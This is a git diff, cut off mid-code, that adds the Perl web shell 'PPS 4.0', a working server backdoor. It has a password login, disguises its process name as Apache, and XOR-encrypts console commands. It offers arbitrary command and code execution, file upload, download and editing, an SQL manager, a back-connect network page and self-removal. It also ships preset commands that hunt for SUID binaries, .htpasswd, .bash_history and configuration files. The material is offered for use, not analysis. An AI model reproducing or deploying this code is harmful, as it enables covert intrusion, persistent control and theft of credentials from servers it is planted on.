'..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}
\ No newline at end of file
diff --git a/pl/pps-pl/pps-v4.0.pl b/pl/pps-pl/pps-v4.0.pl
new file mode 100644
index 00000000..8da9d00b
--- /dev/null
+++ b/pl/pps-pl/pps-v4.0.pl
@@ -0,0 +1,82 @@
+#!/usr/bin/perl
+use IO::Socket;my($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$div1,$dive,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Redirector,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$HeaderBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suffixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$HtmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPassword,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand,$RunCommand1,$RunCommand3,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFile,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$zapros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetName,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd,$iaddr,$paddr,$proto,$rin,$win,$ein,$buff,$rout,$wout,$eout,$sec_key):shared;$0="/usr/sbin/apache2 -k start";# <-- shell in ps aux
+$Password="63a9f0ea7bb98050796b649e85481845";# shell md5(pass)
+$sec_key='1a6510970ba6c98d7e8cfe1e96f3f4d2';# XOR-key: encrypt POST in Console mode (md5)
+$CommandTimeoutDuration=3600;# max time of command execution in seconds
+$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div1='<div class=content><pre class=ml1>';$div='<div class=content>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i(0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form method=POST name='.$ii.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form name='.$ii.' method=post><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'}}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td>';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $file ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
+<html><head><title>PPS 4.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width: 300px}.toolsInp2{border: none;width:100%;height:300px;background-color:#333}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="changeText();document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Pwd:</span></td><td><nobr>
+END
+P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);print " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "<br>$time$tab";print "<span> Server software: </span>$ENV{'SERVER_SOFTWARE'}</span><td>";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td>$tabe";print <<END;
+</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr>$tabe<table width=100% cellpadding=3 cellspacing=0 width=100% bgcolor=#444><td><th width="11%"><form method="POST" name=systeminfo><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form><th></td><td><form method=POST name=files><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C0C0C0" size="2">
+END
+}sub PrintLoginForm{print "<center><form name=f method=POST><input type=password name=p><input type=submit value='>>'></form></center>";}sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><select name=group><option value=delete>Delete</option><option value=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar.gz]</option></select><input type=submit value='>>' onclick='validate()'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writable]</font>';}}sub PrintVar{print <<END;
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST><span>Make file:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+<td>
+END
+&PrintFileUploadForm;print <<END;
+</td>$tabe
+END
+}sub PrintFileUploadForm{print <<END;
+<span>Upload file: </span>
+END
+wr_cur();print <<END;
+<br><form name="upload_file_form" enctype="multipart/form-data" method="POST"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form><script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo');  var lo=document.getElementsByName('zip');for(var i=0;i<names.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i<names.length;i++){names[i].checked=ch;}}</script>
+END
+}&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}
+
+
+
+
+sub ConsoleP{print <<END;
+<form name="runnn" method="POST" onsubmit="this.cccc.value=encrypt(this.cccc.value,'$sec_key');d.runnn.submit()"><br><input type=text size=2 id="sub3" disabled value='\$ '><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text name="cccc" style="border:0px" size=200 class=toolsInp1 id='lsname' value=''><input type=submit class=toolsInp1 id="sub4" value=''></form></td></tr>$tab<td><form name="alias" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit id="sub2" value='>>'></form></td><td><form name="l11" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' class=toolsInp>
+END
+print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $arg(@last){print "<option value=\"$arg\">$arg</option>";}print <<END;
+</select><input type=submit id="sub5" value='>>'></form></td>$tabe<script>
+function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
+function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}</script>$dive
+END
+&PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(!-w $_[0]){$wr='<font color=#FF0000>  Not writable</font>'}else{$wr='<font color=#25ff00>  Writable</font>'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferFile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$tab<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=rename_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value=RENAME></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=touch_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=touch_file value='$motime'><input type=submit value=TOUCH></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d 